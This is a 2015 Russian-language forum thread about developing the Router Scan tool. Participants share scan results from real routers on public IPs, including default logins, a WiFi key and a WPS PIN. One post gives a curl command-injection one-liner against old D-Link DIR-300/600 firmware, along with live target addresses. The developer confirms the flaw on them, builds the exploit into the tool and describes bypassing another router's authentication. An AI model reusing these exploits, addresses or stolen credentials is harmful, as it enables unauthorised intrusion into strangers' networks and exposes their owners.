 |
|

23.09.2015, 02:05
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме: 997379
Репутация:
125
|
|
Сообщение от XAMRAS
Нет данных по данному роутеру:
195.49.185.19:80 admin:admin TP-LINK WindRiver Router
Уже добавил.
Код:
Address: http://195.49.185.19/
Time: 94 ms
Authorization: admin:admin
Device: TP-LINK TL-ER6120
BSSID:
LAN IP: 10.49.1.11
LAN Subnet Mask: 255.255.255.0
WAN IP: 195.49.185.19
WAN Subnet Mask: 255.255.255.248
WAN Gateway: 195.49.185.17
Domain Name Servers: 77.243.0.12 77.243.0.27
Поскольку беспроводные с такой прошивкой мне ещё не встречались, оставил в BSSID.
|
|
|

23.09.2015, 17:05
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме: 997379
Репутация:
125
|
|
Сообщение от kolbak
Как сюда прикреплять файлы, без обменника ?
В каких-то темах я видел возможность прикрепления, но тут вроде её нет.
|
|
|

24.09.2015, 12:32
|
|
Active Member
Регистрация: 19.06.2015
Сообщений: 151
Провел на форуме: 51391
Репутация:
1
|
|
binarymaster, вопрос по поводу вебкамер (ipкамер,видеорегистраторов и прочего) при скане часто попадаются они, но практически не детектируются...
в чем вопрос то (даже пожелание): есть ли в планах сделать поддержку камер (по сути она и так есть, но более побольше внимания им уделить), правда там есть свои нюансы: для просмотра в браузере большинство заточено под IE, каждый вендор имеет свой плагин, но для успешной авторизации плагин не нужен..
P.S.: перечитал - сам не понял что написал (немного пьян), но фак остаётся фактом, поддержка камер значительно бы увеличила привлекательность вашей программы... так же готов предоставить посильную помощ если возникнут какие трудности в реализации....
|
|
|

24.09.2015, 13:52
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме: 109967
Репутация:
171
|
|
Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):
http://www.s3cur1ty.de/m1adv2013-003
tl;dr
Получение пароля:
Код:
curl --data "cmd=cat /var/passwd" http://ip/command.php
http://79.l65.122.75/
http://89.96.28.143:808O/
http://82.176.188.42:808O/
|
|
|

24.09.2015, 20:11
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме: 997379
Репутация:
125
|
|
Сообщение от kolbak
Вопрос ко всем.
Нужна ли подобная инструкция ?
Пишите, пригодится.
Сообщение от zimmer
есть ли в планах сделать поддержку камер
Если какие-либо камеры содержат настройки беспроводной сети - присылайте их IP адреса для изучения и добавления в поддержку. Я никогда не планирую добавление моделей, я добавляю в поддержку то, что мне присылают, либо что нахожу сам.
Сообщение от Felis-Sapiens
Уязвимость в старых прошивках DIR-300 (2.12, 2.13) и DIR-600 (2.12-2.14):
http://www.s3cur1ty.de/m1adv2013-003
Благодарю! Исследую...
|
|
|

24.09.2015, 20:26
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме: 997379
Репутация:
125
|
|
Сообщение от Felis-Sapiens
http://79.l65.122.75/
http://89.96.28.143:808O/
http://82.176.188.42:808O/
Уязвимость присутствует, но файл /var/passwd на всех устройствах пуст. Есть идеи?
UPD:
/var/etc/httpasswd тоже.
UPD 2:
Разобрался, добавил эксплойт в Router Scan.
|
|
|

25.09.2015, 00:11
|
|
Member
Регистрация: 02.02.2011
Сообщений: 31
Провел на форуме: 10322
Репутация:
0
|
|
Обнаружил проблему в работе с *.csv в версии 2.52
Открываю екселем - добавляю коментарий или редактирую таблицу, сохраняю.
RS отказывается брать данные. При сравнении файлов по содержимому видно что ексель убирает "" между ;
Будет ли исправлен стиль формирования *.csv или посоветуй программу в которой можно объединять свои *.csv и удалять лишние строки.
Добавил бы в RS работу с таблицами:
- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)
- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)
|
|
|

25.09.2015, 04:12
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме: 997379
Репутация:
125
|
|
Сообщение от kolbak
это только DIR-300 и DIR-600 или эксплоит будет это пробовать на других роутерах?
Только на этих прошивках этой версии.
Сообщение от kolbak
- добавление ранее сохранных таблиц в открытую, а не заменять (для объединения)
- работу с строками (Shift+↑ - выделить, Del - удалить отмеченное или выбранную строчку)
Попробую сделать.
Сообщение от kolbak
вбил пару ради прикола, а тут
Похоже на баг... он пытается авторизоваться не на той странице, получает код 200 OK...
UPD: исправил баг.
>Интересный PIN
Так сработал один из сплойтов, видимо структура данных отличается, поэтому крякозябры.
>Thomson STB2.01.72
STB2.01.72 добавил.
>Не отдался (((
Он при попытке авторизации отдаёт код 404 (не найдено), хотя должен 401. Видимо какая-то хитрость...
UPD: обошёл её кодом (Code div 100 <> 4) и получил доступ.
Код:
Address: http://83.221.168.157/
Time: 110 ms
Authorization: support:support
Device: Micro DSL (DSL-2750U 963281TAVNG | B038 K8B 0K ME3G-00-test-3388.V03)
BSSID: AC:F1:DF:F1:47:DD
ESSID: DLink
Security type: WPA/WPA2
Key: 3279808zz
WPS Pin: 31957199
LAN IP: 192.168.1.1
LAN Subnet Mask: 255.255.255.0
WAN IP: 83.221.168.157
Domain Name Servers: 217.29.116.2 8.8.8.8
|
|
|

25.09.2015, 15:04
|
|
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
Провел на форуме: 109967
Репутация:
171
|
|
Ericsson GPON SBM4F00ARA - не парсит данные wifi
http://admin:[email protected]/
|
|
|

25.09.2015, 15:48
|
|
Постоянный
Регистрация: 25.09.2015
Сообщений: 562
Провел на форуме: 168564
Репутация:
2
|
|
доброго времени суток.давно с вами, но не регался.специально зарегистрировался чтобы - во-первых высказать свое восхищение сканом, самой идеей и естественно- реализацией. во-вторых заметить, что TL-WR-740N парсит только дефолтовые пароли, эксплойты не работают ( у меня во всяком случае). а если парсит дефолтовый пароль не вытаскивает вайфай. есть тоже проблема с DIR-640 NRU - тащит мак, но дальше не хочет. с микротиком вообще не дружит.только дефолты, а это редкость. ну это понятно. если будет такая возможность нельзя ли учесть это в новых сборках РС?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|